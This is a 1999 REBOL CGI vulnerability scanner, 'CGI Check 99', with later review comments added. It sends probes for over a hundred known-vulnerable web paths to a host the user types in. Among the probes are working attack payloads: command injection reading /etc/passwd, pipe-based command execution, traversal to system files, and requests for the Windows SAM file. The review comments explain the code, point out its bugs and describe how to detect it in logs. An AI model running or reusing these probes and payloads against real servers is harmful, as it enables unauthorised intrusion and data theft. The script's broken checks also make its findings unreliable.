REBOL [
    Title: "CGI Check 99 v0.4"
    Date: 18-nov-1999
    Author: "deepquest"
    Comment: "extra shOut 2: Ken, attrition, H4k, acpo, bhz, vetegirl, nataS, acp0, krisTof, mad55, nucleus."
    Comment: " homebased: www.deepquest.pf"
    Comment: "what's new?: cgi vulnerabilitie from 1996 to 18-2-99"
    Comment: "2do : class A, B, C scan-- add more remote cgi stuff!!"
    File: %cgi-check99v4.r
    Email: deepquest@netscape.net
    Purpose: { most cross platform CGI scanner ported to REBOL. }
]

; Overview
; --------
; Flat script: reads one host name from the console, then for a fixed list of
; paths builds "http://" + host + path and asks `exists?` whether the URL can
; be fetched. Where a check is written with `if`, a label is printed on a hit.
;
; How to read a hit: `exists?` only says the server answered that URL. Nothing
; here inspects the response body or the program's version, so a hit is "path
; answers", not "host is vulnerable". A server that answers every path with a
; success page will presumably light up every check; verify findings by hand.
;
; Defender's view: one run issues well over a hundred requests for fixed,
; mostly absent paths in a fixed order from one client. That burst, and the
; literal query strings further down, are easy to match in web access logs.
;
; The code below is unchanged apart from layout (one check per line). Message
; strings keep the author's spelling ("bugtrad", "butraq", "nhp-test-cgi").

; NOTE(review): `secure none` switches off the interpreter's security policy
; for the whole session. Nothing below reads or writes local files or runs
; programs; only console I/O and HTTP lookups are used, so a narrower policy
; would presumably be enough -- confirm against the interpreter's defaults.
secure none

print "CGI Scanner. by deepquest http://www.deepquest.pf."
prin "Site to scan: "
; The host string is taken as typed and spliced into every URL unchecked.
site: input

; --- Checks that report -------------------------------------------------
; Pattern: word: exists? <url>   if word == yes [ print <label> ]
; `yes` is REBOL's predefined alias for `true`.
;
; NOTE(review): most path strings end in a space that becomes part of the URL.
; How the HTTP scheme treats that trailing space is not visible here; it may
; change what is actually requested -- confirm before trusting a "not found".

; /cgi-bin programs
a: exists? join http:// [ site "/cgi-bin/rwwwshell.pl " ] if a == yes [ print "THC - Backdoor" ]
b: exists? join http:// [ site "/cgi-bin/phf " ] if b == yes [ print "PHF" ]
c: exists? join http:// [ site "/cgi-bin/Count.cgi " ] if c == yes [ print "Count.cgi" ]
d: exists? join http:// [ site "/cgi-bin/test.cgi " ] if d == yes [ print "test-cgi" ]
e: exists? join http:// [ site "/cgi-bin/nph-test-cgi " ] if e == yes [ print "nhp-test-cgi " ]
f: exists? join http:// [ site "/cgi-bin/nph-publish " ] if f == yes [ print "nph-publish" ]
g: exists? join http:// [ site "/cgi-bin/php.cgi " ] if g == yes [ print "PHP" ]
h: exists? join http:// [ site "/cgi-bin/handler " ] if h == yes [ print "handler" ]
i: exists? join http:// [ site "/cgi-bin/webgais " ] if i == yes [ print "webgais" ]
j: exists? join http:// [ site "/cgi-bin/websendmail " ] if j == yes [ print "websendmail" ]
k: exists? join http:// [ site "/cgi-bin/webdist.cgi " ] if k == yes [ print "webdist.cgi" ]
l: exists? join http:// [ site "/cgi-bin/faxsurvey " ] if l == yes [ print "faxsurvey" ]
m: exists? join http:// [ site "/cgi-bin/htmlscript " ] if m == yes [ print "htmlscript" ]
; NOTE(review): spelled "pfdisplay.cgi" here but "pfdispaly.cgi" in check a24;
; only one spelling can match the real program name.
n: exists? join http:// [ site "/cgi-bin/pfdisplay.cgi" ] if n == yes [ print "pfdisplay" ]
o: exists? join http:// [ site "/cgi-bin/perl.exe" ] if o == yes [ print "perl.exe" ]
p: exists? join http:// [ site "/cgi-bin/wwwboard.pl" ] if p == yes [ print "wwwboard.pl" ]
q: exists? join http:// [ site "/cgi-bin/www-sql " ] if q == yes [ print "www-sql" ]
r: exists? join http:// [ site "/cgi-bin/view-source " ] if r == yes [ print "view-source" ]
s: exists? join http:// [ site "/cgi-bin/campas " ] if s == yes [ print "campas" ]
t: exists? join http:// [ site "/cgi-bin/aglimpse " ] if t == yes [ print "aglimpse" ]
u: exists? join http:// [ site "/cgi-bin/glimpse " ] if u == yes [ print "glimpse" ]
v: exists? join http:// [ site "/cgi-bin/man.sh " ] if v == yes [ print "man.sh" ]
w: exists? join http:// [ site "/cgi-bin/AT-admin.cgi " ] if w == yes [ print "AT-admin.cgi" ]
x: exists? join http:// [ site "/cgi-bin/filemail.pl " ] if x == yes [ print "filemail.pl" ]
y: exists? join http:// [ site "/cgi-bin/maillist.pl " ] if y == yes [ print "maillist.pl" ]
z: exists? join http:// [ site "/cgi-bin/jj " ] if z == yes [ print "jj" ]
aa: exists? join http:// [ site "/cgi-bin/info2www " ] if aa == yes [ print "info2www" ]
bb: exists? join http:// [ site "/cgi-bin/files.pl " ] if bb == yes [ print "files.pl" ]
cc: exists? join http:// [ site "/cgi-bin/finger " ] if cc == yes [ print "finger" ]
dd: exists? join http:// [ site "/cgi-bin/bnbform.cgi " ] if dd == yes [ print "bnbform.cgi" ]
ee: exists? join http:// [ site "/cgi-bin/survey.cgi " ] if ee == yes [ print "survey.cgi" ]
ff: exists? join http:// [ site "/cgi-bin/AnyForm2 " ] if ff == yes [ print "AnyForm2" ]
gg: exists? join http:// [ site "/cgi-bin/textcounter.pl " ] if gg == yes [ print "textcounter.pl" ]
hh: exists? join http:// [ site "/cgi-bin/classifieds.cgi " ] if hh == yes [ print "classifieds.cgi" ]
ii: exists? join http:// [ site "/cgi-bin/environ.cgi " ] if ii == yes [ print "environ.cgi" ]
jj: exists? join http:// [ site "/cgi-bin/wrap " ] if jj == yes [ print "wrap" ]
kk: exists? join http:// [ site "/cgi-bin/cgiwrap " ] if kk == yes [ print "cgiwrap" ]
ll: exists? join http:// [ site "/cgi-bin/guestbook.cgi " ] if ll == yes [ print "guestbook.cgi" ]
mm: exists? join http:// [ site "/cgi-bin/edit.pl " ] if mm == yes [ print "edit.pl" ]
nn: exists? join http:// [ site "/cgi-bin/perlshop.cgi " ] if nn == yes [ print "perlshop.cgi" ]

; FrontPage metadata and password files (_vti_*)
oo: exists? join http:// [ site "/_vti_inf.html " ] if oo == yes [ print "_vti_inf.html" ]
pp: exists? join http:// [ site "/_vti_pvt/service.pwd " ] if pp == yes [ print "service.pwd" ]
qq: exists? join http:// [ site "/_vti_pvt/users.pwd " ] if qq == yes [ print "users.pwd" ]
rr: exists? join http:// [ site "/_vti_pvt/authors.pwd" ] if rr == yes [ print "authors.pwd" ]
ss: exists? join http:// [ site "/_vti_pvt/administrators.pwd " ] if ss == yes [ print "administrators.pwd" ]
tt: exists? join http:// [ site "/_vti_pvt/shtml.dll " ] if tt == yes [ print "shtml.dll" ]
uu: exists? join http:// [ site "/_vti_pvt/shtml.exe " ] if uu == yes [ print "shtml.exe" ]

; Windows-hosted CGI directories, IIS /scripts and sample content
vv: exists? join http:// [ site "/cgi-dos/args.bat " ] if vv == yes [ print "args.bat" ]
ww: exists? join http:// [ site "/cgi-win/uploader.exe " ] if ww == yes [ print "uploader.exe" ]
xx: exists? join http:// [ site "/cgi-bin/rguest.exe " ] if xx == yes [ print "rguest.exe" ]
yy: exists? join http:// [ site "/cgi-bin/wguest.exe " ] if yy == yes [ print "wguest.exe" ]
; NOTE(review): "issadmin" here, "iisadmin" in check zzz -- one is presumably a typo.
zz: exists? join http:// [ site "/scripts/issadmin/bdir.htr " ] if zz == yes [ print "BDir - Samples" ]
aaa: exists? join http:// [ site "/scripts/CGImail.exe " ] if aaa == yes [ print "CGImail.exe" ]
bbb: exists? join http:// [ site "/scripts/tools/newdsn.exe " ] if bbb == yes [ print "IIS MDAC RDS vulnerability bugtraq ID: 529 " ]
ccc: exists? join http:// [ site "/scripts/fpcount.exe " ] if ccc == yes [ print "fpcount.exe" ]
; NOTE(review): these four use "/cfdocs/expelval/", while checks a11-a13 use
; "/cfdocs/expeval/"; the two spellings cannot both be the sample directory.
ddd: exists? join http:// [ site "/cfdocs/expelval/openfile.cfm " ] if ddd == yes [ print "openfile.cfm" ]
eee: exists? join http:// [ site "/cfdocs/expelval/exprcalc.cfm " ] if eee == yes [ print "exprcalc.cfm" ]
fff: exists? join http:// [ site "/cfdocs/expelval/displayopenedfile.cfm " ] if fff == yes [ print "displayopenedfile.cfm" ]
ggg: exists? join http:// [ site "/cfdocs/expelval/sendmail.cfm " ] if ggg == yes [ print "sendmail.cfm" ]
hhh: exists? join http:// [ site "/iissamples/exair/howitworks/codebrws.asp " ] if hhh == yes [ print "codebrws.asp" ]
iii: exists? join http:// [ site "/iissamples/sdk/asp/docs/codebrws.asp " ] if iii == yes [ print "codebrws.asp" ]
jjj: exists? join http:// [ site "/msads/Samples/SELECTOR/showcode.asp " ] if jjj == yes [ print "showcode.asp" ]
kkk: exists? join http:// [ site "/search97.vts " ] if kkk == yes [ print "search97.vts" ]
lll: exists? join http:// [ site "/carbo.dll " ] if lll == yes [ print "carbo.dll" ]

; NOTE(review): from here on several URLs carry a payload in the path or query
; string (mmm, sss, and later a11, a14, a17, a19, a22, a24) instead of naming a
; bare file. Those requests ask the target to do something, so a run of this
; script is not a read-only existence check. The same literal strings are
; high-signal patterns for access-log review.
mmm: exists? join http:// [ site "/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd " ] if mmm == yes [ print "whois_raw.cgi" ]
nnn: exists? join http:// [ site "/doc " ] if nnn == yes [ print "Debian Boa" ]
ooo: exists? join http:// [ site "/.html/............./config.sys " ] if ooo == yes [ print "ICQ99" ]
ppp: exists? join http:// [ site "/....../ " ] if ppp == yes [ print "personal webserver" ]
rrr: exists? join http:// [ site "/scripts/no-such-file.pl " ] if rrr == yes [ print "IIS-perl" ]
; NOTE(review): "%2goatfart.html" is not a valid percent-escape ("%2g"); a
; "%2F" was presumably intended, matching the escapes before it.
sss: exists? join http:// [ site "/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&attr= " ] if sss == yes [ print "ODBC default config " ]

; --- Checks that never report -------------------------------------------
; NOTE(review): every statement from here to the end of the file is missing
; the `if`. REBOL still performs the `exists?` request, then evaluates
; `word == yes` and discards the result; the bracketed block that follows is a
; plain literal, so the `print` inside it never runs. The user therefore gets
; no output for any of these checks, although the target still receives the
; requests.
;
; NOTE(review): several probes repeat earlier ones (/_vti_inf.html,
; administrators.pwd, users.pwd, /cgi-win/uploader.exe, wwwboard.pl), and
; aexp4b.htr and /cfdocs/expeval/openfile.cfm are each requested twice in a row.
ttt: exists? join http:// [ site "/_vti_bin/shtml.dll" ] ttt == yes [ print "frontpage authentication dll " ]
uuu: exists? join http:// [ site "/_vti_inf.html " ] uuu == yes [ print "basic configuration of front page " ]
vvv: exists? join http:// [ site "/_vti_pvt/administrators.pwd " ] vvv == yes [ print "admin password file " ]
www: exists? join http:// [ site "/_vti_pvt/users.pwd " ] www == yes [ print "users password file " ]
xxx: exists? join http:// [ site "/msadc/Samples/SELECTOR/showcode.asp " ] xxx == yes [ print "Showcode ASP bugtrad ID:167 " ]
zzz: exists? join http:// [ site "/scripts/iisadmin/ism.dll?http/dir " ] zzz == yes [ print "IIS remote web administration butraq ID:189 " ]
aa1: exists? join http:// [ site "/adsamples/config/site.csc " ] aa1 == yes [ print "adsamples vulnerability bugtrad ID:256 " ]
aa2: exists? join http:// [ site "/main.asp%81 " ] aa2 == yes [ print "IIS double byte code page vulnerability bugtraq ID:477 " ]
aa3: exists? join http:// [ site "/AdvWorks/equipment/catalog_type.asp? " ] aa3 == yes [ print "jet engine VBA vulnerability bugtraq ID:286 " ]
aa4: exists? join http:// [ site "/cgi-win/uploader.exe " ] aa4 == yes [ print " what do u want to upload today?uploader.exe found... " ]
aa5: exists? join http:// [ site "/../../config.sys " ] aa5 == yes [ print "falcon webserver .. stuff bugtraq ID: 743 " ]
aa6: exists? join http:// [ site "/iisadmpwd/achg.htr " ] aa6 == yes [ print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
aa7: exists? join http:// [ site "/iisadmpwd/aexp.htr " ] aa7 == yes [ print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
aa8: exists? join http:// [ site "/iisadmpwd/aexp2.htr " ] aa8 == yes [ print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
aa9: exists? join http:// [ site "/iisadmpwd/aexp4b.htr " ] aa9 == yes [ print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
a10: exists? join http:// [ site "/iisadmpwd/aexp4b.htr " ] a10 == yes [ print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
; NOTE(review): this path has no leading "/", so it is glued straight onto the
; host name and the resulting URL names a different (presumably invalid) host.
a11: exists? join http:// [ site "cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._ " ] a11 == yes [ print "coldFusion remote file display bugtrad ID: 115 " ]
a12: exists? join http:// [ site "/cfdocs/expeval/openfile.cfm " ] a12 == yes [ print "coldFusion remote upload bugtrad ID: 115 " ]
a13: exists? join http:// [ site "/cfdocs/expeval/openfile.cfm " ] a13 == yes [ print "coldFusion remote upload bugtrad ID: 115 " ]
a14: exists? join http:// [ site "/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._ " ] a14 == yes [ print "coldFusion forum access bugtrad ID: 229 " ]
a15: exists? join http:// [ site "/CFIDE/Administrator/startstop.html " ] a15 == yes [ print "coldFusion star/stop sevrvice bugtrad ID: 274 " ]
a16: exists? join http:// [ site "/cgi-bin/wwwboard.pl " ] a16 == yes [ print "web board admin login " ]
a17: exists? join http:// [ site "/cgi-bin/input.bat?|dir..\..\windows " ] a17 == yes [ print "AN-HTTPd CGI bug bugtraq ID: 762 " ]
a18: exists? join http:// [ site "/index.asp::$DATA " ] a18 == yes [ print "IIS asp alternate data bugtraq ID:149 " ]
; Per its own label, this request leaves temp files on the target's disk.
a19: exists? join http:// [ site "/cgi-bin/visadmin.exe?user=guest " ] a19 == yes [ print "OmniHTTPd Web issue make hd full of temp files " ]
a20: exists? join http:// [ site "/?PageServices " ] a20 == yes [ print "Netscape Enterprise remote directory browser "]
a21: exists? join http:// [ site "/ss.cfg " ] a21 == yes [ print "mediahouse statistics server password bugtraq ID: 735 " ]
a22: exists? join http:// [ site "/cgi-bin/get32.exe|echo%20>c:\file.txt " ] a22 == yes [ print "Alibaba cgi issue bugtraq ID: 770 " ]
a23: exists? join http:// [ site "/cgi-bin/cachemgr.cgi " ] a23 == yes [ print "squid cache mngr bugtraq ID:149 " ]
a24: exists? join http:// [ site "/cgi-bin/pfdispaly.cgi?/../../../../etc/motd "] a24 == yes [ print "IRIS performer API search tool " ]

; Lotus Domino databases
a25: exists? join http:// [ site "/domcfg.nsf " ] a25 == yes [ print "lotus domino write database and server configuration " ]
a26: exists? join http:// [ site "/today.nsf" ] a26 == yes [ print "lotus domino write database and server configuration " ]
a27: exists? join http:// [ site "/names.nsf " ] a27 == yes [ print "lotus domino write database and server configuration " ]
a28: exists? join http:// [ site "/catalog.nsf " ] a28 == yes [ print "lotus domino write database and server configuration " ]
a29: exists? join http:// [ site "/log.nsf " ] a29 == yes [ print "lotus domino write database and server configuration " ]
a30: exists? join http:// [ site "/domlog.nsf " ] a30 == yes [ print "lotus domino write database and server configuration " ]

; Miscellaneous servers
a31: exists? join http:// [ site "/cgi-bin/AT-generate.cgi " ] a31 == yes [ print "security bugs in excite for Web Servers 1.1 " ]
a32: exists? join http:// [ site "/secure/.wwwacl " ] a32 == yes [ print "Access Control List in CERN server " ]
a33: exists? join http:// [ site "/secure/.htaccess " ] a33 == yes [ print "Access Control List in NCSA-derived servers " ]
a34: exists? join http:// [ site "/samples/search/webhits.exe " ] a34 == yes [ print "MS indexer server issue searching #filename=*.asp " ]
a35: exists? join http:// [ site "/scripts/srchadm/admin.idq " ] a35 == yes [ print "MS indexer server issue displaying remote tree " ]
a36: exists? join http:// [ site "/cgi-bin/dumpenv.pl " ] a36 == yes [ print " Sambar remote server info tree-users and more..." ]
; NOTE(review): no leading "/" here either; same malformed-URL problem as a11.
a37: exists? join http:// [ site "adminlogin?RCpage=/sysadmin/index.stm " ] a37 == yes [ print " Sambar remote login on default configuration " ]
a38: exists? join http:// [ site "/c:/program " ] a38 == yes [ print " Sambar remote browsing on c: " ]
a39: exists? join http:// [ site "/getdrvrs.exe " ] a39 == yes [ print "NT ODBC remote issue " ]
; NOTE(review): the words a30-a33 are assigned a second time below and
; overwrite the results stored above. Harmless today because nothing reads
; them afterwards, but it would mislabel findings if results were collected.
a30: exists? join http:// [ site "/test/test.cgi " ] a30 == yes [ print "Cobalt RaQ2 cgiwrap issue bugtraq ID:777 " ]
a31: exists? join http:// [ site "/scripts/submit.cgi " ] a31 == yes [ print "Cobalt RaQ2 cgiwrap issue bugtraq ID:777 " ]
a32: exists? join http:// [ site "/users/scripts/submit.cgi " ] a32 == yes [ print "Cobalt RaQ2 cgiwrap issue bugtraq ID:777 " ]
a33: exists? join http:// [ site "/ncl_items.html?SUBJECT=2097 " ] a33 == yes [ print " Tektronix PhaserLink webserver administrator password bugtraq ID:806 " ]